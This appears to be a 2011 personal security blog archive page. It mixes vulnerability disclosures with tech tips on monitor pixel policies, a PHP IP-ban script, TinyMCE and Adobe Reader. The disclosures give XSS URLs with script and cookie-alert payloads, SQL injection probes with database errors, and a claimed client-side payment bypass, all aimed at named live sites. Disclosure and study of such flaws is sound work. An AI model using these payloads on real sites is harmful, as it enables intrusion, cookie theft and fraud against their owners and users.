Skip to main content

Posts

Showing posts from September, 2011

scam, xss, spam, free/fake registration - ilpopolodellaliberta.it

http://adesioneonline.ilpopolodellaliberta.it/include/comuni.php?comune=Ades.natoa&prov=Ades.natopr%0A%3Cscript%3Ealert%281%29%3C/script%3E%0A&id=Ades.idcomunens&stato=Ades.statonato&label=1&idprovv=Ades.idprovnascita

There are several xss - I've no time to list them all.
-----------------------------------

We can change any value on the client side, quite no verification on server side.
I've subscribed for 0€
-----------

During the registration as a payment gateway I've choosed this one
www.monetaonline.it/

and it's so strange that this p.g. have only client-side checks!!!


After submitting the data I've got an internal server error and I've got the successful page
at http://adesioneonline.ilpopolodellaliberta.it/s27servertransazioneritorno.php

I've *paid* my *free* subscription to the PDL.

LCD Display Pixel Policy

APPLE - rumors are referring about up to 15 anomalies (dead/bright/dark/any_strange pixel) for a support request
LCD display pixel anomalies for Apple products released before 2010
http://support.apple.com/kb/HT1721
About LCD display pixel anomalies for Apple products released in 2010 and later
http://support.apple.com/kb/HT4044

ASUS

ASUSTeK Australia and New Zealand LCD Monitor Warranty Policy
http://support.asus.com/repair.aspx?no=587&SLanguage=en
ASUS ZBD (Zero Bright Dot )
http://support.asus.com/repair.aspx?no=579&SLanguage=en

ATEN - Altusen
http://www.aten.com/data/announcement/zero-dead-pixel-policy.html

BenQ -  for FP series up to 24" (7 days)

Dell - All the monitors (15 days)
http://support.dell.com/support/topics/global.aspx/support/kcs/document?docid=414288

EIZO - 5/3/2/1 years.
global eizo - http://www.eizo.com/global/support/warranty/index.html
warranty it - http://www.eizo.it/supporto/garanzia.html
warranty au - http://eizo.com.au/support/warranty/index.php
pixel polic…

www.pdlcamera.it | SQL Injection

Sample
http://www.pdlcamera.it/ufficioStampa2010.asp?News_ID=3'

Syntax error in string in query expression 'pubblicato=true AND News_ID=3' ORDER BY Date_stamp DESC'.

http://www.pdlcamera.it/ufficioStampa2010.asp?News_ID=3 group by 1

Cannot group on fields selected with '*' (tblNews).

yeppa, we have the table ... and so on...

delicious.com | XSS

the XSS is quite simple
just add
http://delicious.com/save?jump=yes&v=2%3Csurox&url=http://trueliarx.blogspot.com/%22%3E%3Cimg%20src=1%20onerror=alert(document.cookie)%3E%3C%22&title=pro(re)gress






(fixed)
Spammy
http://forums.utest.com/rss.php?mode=Lorem%20ipsum%20dolor%20sit%20amet,%20consectetur%20adipiscing%20elit.%20Nunc%20sit%20amet%20elit%20turpis.%20Cras%20elementum,%20turpis%20quis%20rutrum%20viverra,%20dui%20sapien%20auctor%20lorem,%20sed%20suscipit%20dui%20odio%20eget%20ligula.%20Nunc%20a%20sem%20mauris,%20a%20porta%20tortor.%20Nunc%20in%20varius%20justo.%20Praesent%20venenatis%20ultrices%20condimentum.%20Morbi%20eget%20imperdiet%20ante.%20Praesent%20eros%20metus,%20pulvinar%20nec%20laoreet%20a,%20aliquam%20nec%20orci.%20Nunc%20cursus%20condimentum%20lacus,%20at%20dictum%20sapien%20tincidunt%20non.%20Nullam%20gravida%20condimentum%20leo,%20id%20porta%20nibh%20placerat%20sit%20amet.%20Phasellus%20sed%20elit%20vel%20quam%20ornare%20laoreet.

(They have fixed it)

ninjasaga fb game - error denial of service free rewards

Fatal error: Uncaught exception 'Exception' with message 'Unknown column 'WALLFEED_ID' in 'where clause' sql >> delete from GET_FRIEND_REWARD where WALLFEED_ID=135494 limit 1' in /home/ninjasaga/bitemycode_api/include/db/DBConnector.php:191 Stack trace: #0 /home/ninjasaga/app.ninjasaga.com/fb_oauth_2.0/friend_reward.php(692): DBConnector->query('delete from GET...', 'social') #1 /home/ninjasaga/app.ninjasaga.com/fb_en/friend_reward.php(4): require_once('/home/ninjasaga...') #2 {main} thrown in /home/ninjasaga/bitemycode_api/include/db/DBConnector.php on line 191

Php - a fast(?) and simple approach to ban ips from your website

This is a very old tiny script that I've used to ban ip addresses from the php page/website. Bans are not a good solution in terms of performances of the website, expecially if the bans list is long or complex to elaborate.


function checkbans(){
    $handle = fopen("ipbans.dat.php", "r");
    if($handle === false){ return false; }
    while (!feof($handle)) {
        $line = trim(fgets($handle, 32));
        if( $line == $_SERVER['REMOTE_ADDR'] )
        {
            fclose($handle);
            //header('Location: http://www.google.com'); //redirect to google?
            exit();
        }
    }
    fclose($handle);
}
You can just call the checkbans() functions from your php file.
The storage file should be outside the web root or, if you are using it with the php extension, add
<?php exit(); ?> in the first line.


This is not a solution to suggest but I've found it in my old crappy code (more than five years ago).

I actually use a mix…

TinyMCE not starting

While (ab)using TinyMCE all of the sudden it stopped working and there was no error/notice in the JS errors Console. I've tried several things without success and after 20 minutes I've thinket to start "tamper data" in firefox to check what was wrong. The problem was quite simple ... a plugin was completely missing (404 page). If TinyMCE doesn't start check the errors console, missing files, missing div/textarea with relative ID.

Adobe Reader X - Eula problem (again)

Acrobat Reader X is quite boring with useless problems that are annoying a lot of users. This time I got this message "Before proceeding you must first launch Adobe Acrobat and accept the End User License Agreement" while opening pdf files downloaded via browser. The previous solution (run adobe reader without any pdf file and accept the eula) haven't worked The only method that have worked for me is to add the following registry key to accept the eula for the browsers. --copy the following text in a .reg file and run-- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Adobe\Adobe Acrobat\10.0\AdobeViewer] "EULAAcceptedForBrowser"=dword:00000001